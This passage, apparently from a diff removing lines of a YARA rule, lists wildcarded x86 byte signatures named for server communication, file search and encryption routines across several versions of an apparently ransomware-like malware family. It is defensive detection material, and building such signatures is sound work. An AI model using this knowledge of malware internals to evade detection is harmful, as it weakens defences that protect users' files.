-            8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ??
-            ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ??
-            ?? 53 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ??
-            8A 10 83 C0 ?? 3A D3 75 F7 55 56 57 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C
-            24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14
-            85 ?? ?? ?? ?? 51 53 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 53 53 6A ?? 53 53 73 23 8B 04 85 ?? ?? ?? ?? 6A ?? 50
-            57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 53 8D 4C 24 ?? 8B F0 51 EB 24 8B 14 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 57 FF
-            15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 8B F0 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C
-        }
-		$server_communication_0_3_1_2 = {
-            24 ?? ?? ?? ?? 53 51 8B E8 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 55 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 8C
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 54 24 ?? 68 ??
-            ?? ?? ?? 52 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 55 FF D3
-        }
-		$server_communication_0_3_3_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 50 ?? 8A 08 83 C0 ?? 84 C9 75
-            F7 2B C2 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 33 C0
-            83 C4 ?? 50 50 50 50 52 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6
-            EB 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 56 51
-            8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
-            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51
-            52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? 8A 10 83 C0 ?? 84 D2 75 F7 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24
-        }
-		$server_communication_0_3_3_2 = {
-            52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? ?? ?? ?? 6A ?? 52
-            57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 57 FF
-            D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 C6 84 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 55 8B 2D ?? ?? ?? ?? FF D5
-        }
-		$server_communication_0_3_4a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 EB
-            04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D
-            ?? ?? ?? ?? 56 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50
-            A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
-        }
-		$server_communication_0_3_4a_2 = {
-            8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ??
-            ?? ?? ?? 6A ?? 52 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 51 57 FF D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8
-            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 18 55 8B 2D ?? ?? ?? ?? FF D5 57 FF D5 83 C6 ?? 83 FE ?? 0F 8C CE
-            FD FF FF 8B 44 24 ?? 50 FF 15
-        }
-		$server_communication_0_3_5a_1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44
-            24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 2B C2 75 05 E8 ?? ?? ?? ?? 33 C0 50 50 50 50
-            68 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 33 DB 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ??
-            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83
-            C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 53 51 8B 0D ?? ?? ?? ?? 51 8B 0D ??
-            ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ??
-            83 C4 ?? 8D 70 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 8D 94 24 ?? ?? ?? ?? 2B C6 52 8D 7C 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
-            8D 8C 04 ?? ?? ?? ?? 8B F7 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8
-        }
-		$server_communication_0_3_5a_2 = {
-            8B 14 9D ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 FB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 20 6A ?? 52 50 FF 15 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 8B F0 51 EB 39 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 8B 0C 9D ??
-            ?? ?? ?? 8B 14 9D ?? ?? ?? ?? 51 6A ?? 52 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50
-            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 8B F8 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 32 8D 54
-            24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 18 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 83 C3 ?? 83 FB ?? 0F 8C CD FD FF FF 8B 54 24 ?? 52 FF 15
-        }
-		$server_communication_2_0_4e = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 53 56 57 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? A1 ??
-            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? B8 ?? ?? ??
-            ?? 8D 50 ?? 33 DB 8A 08 40 3A CB 75 ?? 2B C2 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 68
-            ?? ?? ?? ?? FF 15
-        }
-		$search_and_encrypt_2_0_4e_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56
-            57 33 C0 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 33 D2 68 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 84
-        }
-		$search_and_encrypt_2_0_4e_2 = {
-            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
-            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
-        }
-		$search_and_encrypt_2_0_4e_3 = {
-            8B C3 83 C4 ?? 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84
-        }
-		$search_and_encrypt_2_0_4e_4 = {
-            8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ??
-            66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8
-        }
-		$search_and_encrypt_2_0_4e_5 = {
-            8D 85 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8D 95 ??
-            ?? ?? ?? D1 F8 52 8D 78 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 8B 3D
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83
-            C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 8B C6 E8 ?? ?? ?? ??
-            83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15
-        }
-		$server_communication_4_0_1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24
-        }
-		$server_communication_4_0_2 = {
-            8A 08 40 3A CB 75 ?? 2B ?? 50 8D ?? ?? ?? ?? ?? ?? [0-2] E8 ?? ?? ?? ?? 83 C4 04 8D
-            ?? 24 ?? ?? ?? ?? ?? (8B ??|8D ?? 24 ?? ?? ?? ??) ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 08 8D ?? 01 [0-7] 8A 08 40 3A CB
-            75 ?? 2B ?? 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D 84 0C
-            ?? ?? ?? ?? 50 E8
-        }
-		$server_communication_4_0_3 = {
-            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? ?? [1-2]
-            8D ?? 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? [0-3] 51 E8 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 83 C4 ?? 8B ?? 8B 42 ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 33 ?? 89 ?? 24 ?? 6A ?? 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 24 ??
-            ?? ?? ?? 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
-            ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8B ?? 83 C4 ?? 8D 50
-        }
-		$file_search_4_0_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 33 C0 68
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 68 ??
-            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 51 E8
-        }
-		$file_search_4_0_2 = {
-            74 ?? FF 15 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 48 ?? 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B F0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D0 83 FF ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ??
-            ?? ?? 74 ?? 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 51 ?? 8D 85 ?? ?? ?? ?? 50 52
-            8D 85 ?? ?? ?? ?? 50 EB ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? 50 8D 8D
-        }
-		$file_search_4_0_3 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33
-            CD 33 C0 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$file_search_4_1b_1 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-        }
-		$file_search_4_1b_2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? ?? ?? ?? 83 FF ??
-            0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 48 ?? 8D 95 ?? ?? ?? ?? 52
-            51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ??
-            ?? ?? 8B 1D
-        }
-		$file_search_4_1b_3 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ??
-            ?? 6A ?? 66 89 45 ?? 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 45 ?? ?? ?? ?? ??
-            FF D3 85 C0 74 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$server_communication_4_1b_1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8
-        }
-		$server_communication_4_1b_2 = {
-            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 83 C4 ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 44 24 ?? 3B C3 75 ?? ?? ?? B8 ?? ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? 8D
-            ?? 24 ?? ?? ?? ?? 53 51 E8 ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F
-            B6 ?? ?? ?? ?? ?? 83 C4 0C
-        }
-		$server_communication_4_1b_3 = {
